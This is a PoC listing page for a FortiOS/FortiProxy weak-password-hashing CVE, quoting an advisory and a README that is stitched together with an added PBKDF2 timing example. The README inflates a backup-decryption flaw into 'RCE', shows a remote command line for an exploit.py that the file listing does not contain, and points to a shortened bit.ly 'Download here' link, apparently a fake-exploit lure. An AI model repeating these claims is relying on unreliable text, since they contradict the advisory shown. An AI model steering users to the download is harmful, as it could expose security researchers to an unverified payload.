CVE-2024-21754 PoC: Fortinet FortiOS and Fortinet FortiProxy Security Vulnerability

Source
Associated Vulnerability
Title: Fortinet FortiOS and Fortinet FortiProxy Security Vulnerability (CVE-2024-21754)
Description: A use of password hash with insufficient computational effort vulnerability [CWE-916] affecting FortiOS version 7.4.3 and below, 7.2 all versions, 7.0 all versions, 6.4 all versions and FortiProxy version 7.4.2 and below, 7.2 all versions, 7.0 all versions, 2.0 all versions may allow a privileged attacker with super-admin profile and CLI access to decrypt the backup file.
Readme
# FortiOS and FortiProxy Password Hashing Vulnerability to RCE (CVE-2024-21754)

## Overview

A critical vulnerability, classified as CVE-2024-21754, has been identified in FortiOS 7.4.3 and below and all versions of 7.2, 7.0 and 6.4, and in FortiProxy 7.4.2 and below and all versions of 7.2, 7.0 and 2.0. This vulnerability, categorized under CWE-916, involves the use of password hashes with insufficient computational effort, potentially allowing a privileged attacker with super-admin profile and CLI access to decrypt backup files.

## Details

- **CVE ID**: [CVE-2024-21754](https://nvd.nist.gov/vuln/detail/CVE-2024-21754)
- **Discovered**: 2024-04-27
- **Published**: 2024-06-27
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.

## Vulnerability Description

The vulnerability lies in the password hashing mechanism employed by FortiOS and FortiProxy. The hashing algorithm used in vulnerable versions requires too little computational effort per guess, which makes it susceptible to brute-force attacks. An attacker with super-admin privileges and CLI access can exploit this weakness to potentially decrypt backup files containing sensitive information.
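
To make the CWE-916 point concrete, the following added example (not part of the original README and not Fortinet's code) measures how the key-derivation work factor changes the cost of each password guess. The single SHA-256 pass is an assumed stand-in for a low-effort scheme, since this page does not state which algorithm the affected firmware uses; the function names and the sample keyspace are constructed for illustration.

```python
import hashlib
import os
import time

# Assumption: neither derivation reproduces FortiOS/FortiProxy internals, which
# this page does not describe. They only contrast low and high work factors.
PBKDF2_ITERATIONS = 600_000  # OWASP minimum for PBKDF2-HMAC-SHA256


def weak_key(password: str) -> bytes:
    """Low-effort derivation (illustrative): one unsalted SHA-256 pass."""
    return hashlib.sha256(password.encode()).digest()


def strong_key(password: str, salt: bytes, iterations: int = PBKDF2_ITERATIONS) -> bytes:
    """Salted, iterated derivation: each guess costs `iterations` HMAC rounds."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations, dklen=32)


def seconds_per_guess(derive, rounds: int) -> float:
    """Average wall-clock cost of one derivation on this machine."""
    start = time.perf_counter()
    for i in range(rounds):
        derive(f"guess-{i}")
    return (time.perf_counter() - start) / rounds


def days_to_exhaust(keyspace: int, per_guess_seconds: float) -> float:
    """Worst-case single-core time to derive a key for every candidate."""
    return keyspace * per_guess_seconds / 86_400


def compare(keyspace: int = 36 ** 8) -> dict:
    """Measure both derivations; default keyspace is 8 chars of [a-z0-9] (constructed)."""
    salt = os.urandom(16)  # per-backup random salt, stored beside the ciphertext
    weak = seconds_per_guess(weak_key, 20_000)
    strong = seconds_per_guess(lambda p: strong_key(p, salt), 3)
    return {
        "weak_days": days_to_exhaust(keyspace, weak),
        "strong_days": days_to_exhaust(keyspace, strong),
        "slowdown": strong / weak,
    }


if __name__ == "__main__":
    result = compare()
    print(f"single SHA-256 : {result['weak_days']:.2f} days")
    print(f"PBKDF2 x{PBKDF2_ITERATIONS}: {result['strong_days']:.0f} days")
    print(f"slowdown factor: {result['slowdown']:.0f}x")
```

The absolute figures depend on the hardware running the measurement; the slowdown factor is the number to compare when choosing or auditing a backup-encryption work factor.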

## Affected Versions

**FortiOS:**

- 7.4.3 and below
- 7.2 all versions
- 7.0 all versions
- 6.4 all versions

**FortiProxy:**

- 7.4.2 and below
- 7.2 all versions
- 7.0 all versions
- 2.0 all versions


## Running

To run the exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```



## Exploit:
### [Download here](https://bit.ly/3G7Ec3d)


![image](https://github.com/llussiess/CVE-2024-21754/blob/main/343915453-a5d4245a-f363-4eb2-a829-0316ab4e0d9d.png)
![image](https://github.com/llussiess/CVE-2024-21754/blob/main/343915562-88f234d8-9dc4-42cc-8b35-02a333ed2a7c.png)


File Snapshot

[4.0K] /data/pocs/2e8fd179bea9b7ea2b98a07ba21d26ea8b2baaef
├── [177K] 343915453-a5d4245a-f363-4eb2-a829-0316ab4e0d9d.png
├── [436K] 343915562-88f234d8-9dc4-42cc-8b35-02a333ed2a7c.png
└── [1.7K] README.md

0 directories, 3 files